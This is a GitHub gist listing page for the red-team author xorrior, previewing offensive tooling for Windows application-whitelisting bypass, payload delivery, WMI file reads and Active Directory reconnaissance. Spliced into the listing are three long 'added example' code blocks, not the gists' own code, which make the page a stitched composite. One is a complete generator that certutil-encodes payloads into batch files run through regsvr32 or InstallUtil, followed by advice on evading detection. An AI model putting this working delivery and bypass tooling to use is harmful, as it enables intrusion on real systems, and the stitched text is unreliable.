Chris Ross xorrior


Keybase proof

I hereby claim:

  • I am xorrior on github.
  • I am xorrior on keybase.
  • I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7

To claim this, I am signing this object:

xorrior / LoadMethodScanner.ps1
Created Aug 11, 2017 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here:
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
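The preview above stops at the parameter block. The following is an added example, not the gist's code (and not Matthew Graeber's), showing the scan the description refers to: load each file with dnlib, walk every method body, and report call sites of Assembly.Load(byte[]) or AppDomain.Load(byte[]), the in-memory load primitives that matter for UMCI bypass research because they have to live inside an already-trusted binary. The -DnlibPath default, the output field names and the decision to skip anything dnlib cannot parse are assumptions of this example.

```powershell
# Added example, not the gist's own code. A dnlib-based scanner in the spirit of
# LoadMethodScanner.ps1: walk every method body in a managed PE and report calls
# to Assembly.Load(byte[]) / AppDomain.Load(byte[]). Assumptions (mine): dnlib.dll
# sits at -DnlibPath; files dnlib cannot parse (native PEs, non-PEs) are skipped.
function Find-AssemblyLoadCall {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true)]
        [Alias('FullName')]
        [string] $Path,

        [string] $DnlibPath = (Join-Path $PWD 'dnlib.dll')
    )

    begin {
        if (-not ('dnlib.DotNet.ModuleDefMD' -as [type])) { Add-Type -Path $DnlibPath }
        $loaderTypes = 'System.Reflection.Assembly', 'System.AppDomain'
    }

    process {
        $item = Get-Item -LiteralPath $Path -ErrorAction SilentlyContinue
        if (-not $item -or $item.PSIsContainer) { return }

        try { $module = [dnlib.DotNet.ModuleDefMD]::Load($item.FullName) }
        catch { return }   # not a managed PE (or unreadable); nothing to scan

        try {
            # Embedded Authenticode only: catalog-signed files report NotSigned here,
            # so cross-check hits against the catalog separately.
            $sigStatus = (Get-AuthenticodeSignature -FilePath $item.FullName).Status
            foreach ($type in $module.GetTypes()) {
                foreach ($method in $type.Methods) {
                    if (-not $method.HasBody) { continue }
                    foreach ($insn in $method.Body.Instructions) {
                        $code = $insn.OpCode.Code
                        if ($code -ne [dnlib.DotNet.Emit.Code]::Call -and
                            $code -ne [dnlib.DotNet.Emit.Code]::Callvirt) { continue }
                        $callee = $insn.Operand -as [dnlib.DotNet.IMethod]
                        if (-not $callee -or "$($callee.Name)" -ne 'Load') { continue }
                        if ($loaderTypes -notcontains "$($callee.DeclaringType.FullName)") { continue }
                        # First parameter must be byte[]: that is the in-memory load overload.
                        $params = $callee.MethodSig.Params
                        if ($params.Count -lt 1 -or "$($params[0].FullName)" -ne 'System.Byte[]') { continue }
                        [pscustomobject]@{
                            Path      = $item.FullName
                            Signature = $sigStatus
                            Caller    = $method.FullName
                            Callee    = $callee.FullName
                        }
                    }
                }
            }
        }
        finally { $module.Dispose() }
    }
}

# Usage, mirroring the gist's own example line:
# Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | Find-AssemblyLoadCall
```

Matching on declaring type, method name and first parameter type, rather than on a literal full-name string, keeps the check independent of how dnlib formats the signature. The Signature field is only a first filter: UMCI also trusts catalog-signed files, which Get-AuthenticodeSignature reports as NotSigned.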
xorrior / New-CplBatchFile.ps1
Last active Sep 20, 2017
Generate Batch file for cpl file
function New-CplBatchFile
Generates a batch file that carries a certutil-encoded, cab-compressed payload.
The batch file decodes and expands the cab, then executes the DLL inside it with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
xorrior / SampleRules.plist
Created Jan 9, 2018
Sample Plist for emond
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<string>sample rule</string>
xorrior / pshell_template_embedded_script.xml
Created Dec 20, 2016
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
<Target Name="Hello">
xorrior / empire-migrationplugin.m
Created May 25, 2018
Migration Plugin with Empire Payload
// demoClass.m
// testExampleBundle
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
#import <Foundation/Foundation.h>
#import <objc/objc.h>
xorrior / SMConfMigratorPlugin.h
Created Jun 18, 2018
SMConfMigratorPlugin header file
// Generated by class-dump 3.5 (64 bit).
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
@class NSObject, SMMigrationRequest;
xorrior / FileReadPrimitive.ps1
Created Jun 28, 2018 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
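The preview ends as the snippet pulls the first four bytes of FileData. The following is an added example, not the gist's code (and not Matthew Graeber's), that wraps the same PS_ModuleFile primitive in a function and adds the check a practitioner wants before trusting the prefix: decode it, compare it with the number of bytes actually returned, and warn on a mismatch. The function name, the -OutFile parameter and the treatment of the prefix as a 4-byte big-endian length are assumptions of this example.

```powershell
# Added example, not the gist's own code. Wraps the PS_ModuleFile read primitive
# from FileReadPrimitive.ps1 in a function and validates the length prefix before
# trusting it. Assumption (mine): FileData is a 4-byte big-endian length followed
# by the raw file bytes.
function Get-WmiFileContent {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $true)] [string] $ComputerName,
        [Parameter(Mandatory = $true)] [string] $FilePath,
        [PSCredential] $Credential,
        [string] $OutFile   # optional: write the bytes here instead of returning them
    )

    $sessionArgs = @{ ComputerName = $ComputerName }
    if ($Credential) { $sessionArgs['Credential'] = $Credential }
    $session = New-CimSession @sessionArgs
    try {
        # PS_ModuleFile only implements GetInstance, so build a client-only
        # instance keyed on the path and fetch that exact instance.
        $class = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $session
        $key   = New-CimInstance -CimClass $class -Property @{ InstanceID = $FilePath } -ClientOnly
        $inst  = Get-CimInstance -InputObject $key -CimSession $session
    }
    finally {
        Remove-CimSession -CimSession $session
    }

    [byte[]] $data = $inst.FileData
    if ($data.Length -lt 4) { throw "No file data returned for $FilePath" }

    # Length prefix: reverse the first four bytes (big-endian, assumed) and decode.
    [byte[]] $lenBytes = $data[0..3]
    [Array]::Reverse($lenBytes)
    $declared = [BitConverter]::ToUInt32($lenBytes, 0)
    $actual   = $data.Length - 4
    if ($declared -ne $actual) {
        Write-Warning "Length prefix $declared does not match $actual payload bytes; the endianness assumption may be wrong. Returning everything after the prefix."
    }
    if ($actual -le 0) { return ,([byte[]]@()) }   # zero-length file
    [byte[]] $fileBytes = $data[4..($data.Length - 1)]

    if ($OutFile) {
        # Resolve relative to the PowerShell location, not the .NET working directory.
        $dest = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutFile)
        [IO.File]::WriteAllBytes($dest, $fileBytes)
        return Get-Item -LiteralPath $dest
    }
    return ,$fileBytes
}

# Usage (target name is a placeholder):
# Get-WmiFileContent -ComputerName target01 -FilePath C:\Windows\System32\notepad.exe -OutFile .\notepad.exe
```

The whole read rides over WMI/WinRM, so on the target the only trace is a CIM operation against ROOT/Microsoft/Windows/Powershellv3 rather than an SMB file open; that is the point of the primitive and also what a detection would have to key on.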
xorrior / PowerView-3.0-tricks.ps1
Created Jul 5, 2018 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
xorrior / New-InstallUtilBatchFile.ps1
Created Oct 27, 2016
Generate InstallUtil payload within batch file for delivery
function New-InstallUtilBatchFile
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll" /out:payload.exe payload.cs
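New-CplBatchFile and New-InstallUtilBatchFile describe the same delivery pattern: certutil-encode a payload into a batch file that rebuilds it on the target and launches it with a living-off-the-land binary. The following is an added example, not either gist's code, that generalizes both into one generator: makecab-compress, certutil-encode, and emit a .bat that decodes, expands and runs the payload with regsvr32 (DLL) or InstallUtil (.NET exe). The function name, the -StageDir parameter and the file-naming on the target are assumptions of this example.

```powershell
# Added example, not the gists' own code. Generalizes New-CplBatchFile and
# New-InstallUtilBatchFile. Assumptions (mine): makecab and certutil exist on the
# build host; certutil, expand, regsvr32 and InstallUtil exist on the target; a
# DLL payload exports DllRegisterServer; an exe payload carries an installer class
# so that InstallUtil /U runs it.
function New-EncodedBatchFile {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({ Test-Path -LiteralPath $_ -PathType Leaf })]
        [string] $PayloadPath,

        [Parameter(Mandatory = $true)]
        [ValidateSet('Regsvr32', 'InstallUtil')]
        [string] $Launcher,

        [Parameter(Mandatory = $true)]
        [string] $OutFile,

        # Directory the batch file stages into on the target (cmd.exe syntax).
        [string] $StageDir = '%TEMP%'
    )

    $resolve     = { param($p) $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($p) }
    $payloadFull = & $resolve $PayloadPath
    $outFull     = & $resolve $OutFile
    $payloadName = Split-Path -Leaf $payloadFull
    $cabPath     = Join-Path $env:TEMP "$payloadName.cab"
    $b64Path     = Join-Path $env:TEMP "$payloadName.cab.txt"

    # 1. Compress with makecab (single-file cab keeps the batch file small).
    & makecab.exe $payloadFull $cabPath | Out-Null
    if (-not (Test-Path -LiteralPath $cabPath)) { throw "makecab failed for $payloadFull" }

    # 2. Encode with certutil: base64 between BEGIN/END CERTIFICATE lines, which
    #    certutil -decode on the target accepts as-is.
    & certutil.exe -f -encode $cabPath $b64Path | Out-Null
    if (-not (Test-Path -LiteralPath $b64Path)) { throw "certutil -encode failed for $cabPath" }
    $encoded = Get-Content -LiteralPath $b64Path

    # 3. Emit the batch file. The redirection goes before echo so a line ending in
    #    a digit is never parsed as a stream redirect (echo ...1>>file).
    $txt = "$StageDir\$payloadName.txt"
    $cab = "$StageDir\$payloadName.cab"
    $bin = "$StageDir\$payloadName"
    $lines = New-Object System.Collections.Generic.List[string]
    $lines.Add('@echo off')
    $lines.Add("if exist `"$txt`" del /q `"$txt`"")
    foreach ($line in $encoded) { $lines.Add(">>`"$txt`" echo $line") }
    $lines.Add("certutil -f -decode `"$txt`" `"$cab`" >nul")
    $lines.Add("expand `"$cab`" `"$bin`" >nul")
    switch ($Launcher) {
        'Regsvr32'    { $lines.Add("regsvr32 /s `"$bin`"") }
        'InstallUtil' { $lines.Add("%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U `"$bin`"") }
    }
    $lines.Add("del /q `"$txt`" `"$cab`"")
    [IO.File]::WriteAllLines($outFull, [string[]] $lines)

    Remove-Item -LiteralPath $cabPath, $b64Path -ErrorAction SilentlyContinue
    Get-Item -LiteralPath $outFull
}

# Usage (paths are placeholders):
# New-EncodedBatchFile -PayloadPath .\payload.dll -Launcher Regsvr32 -OutFile .\run.bat
# New-EncodedBatchFile -PayloadPath .\payload.exe -Launcher InstallUtil -OutFile .\run.bat
```

The target-side chain is the same for both launchers: cmd.exe writes a text file, then spawns certutil -decode, expand, and finally regsvr32 or InstallUtil against a binary in %TEMP%. That sequence is exactly what process-creation telemetry keys on, so if stealth matters the staging directory and file names are the first things to change.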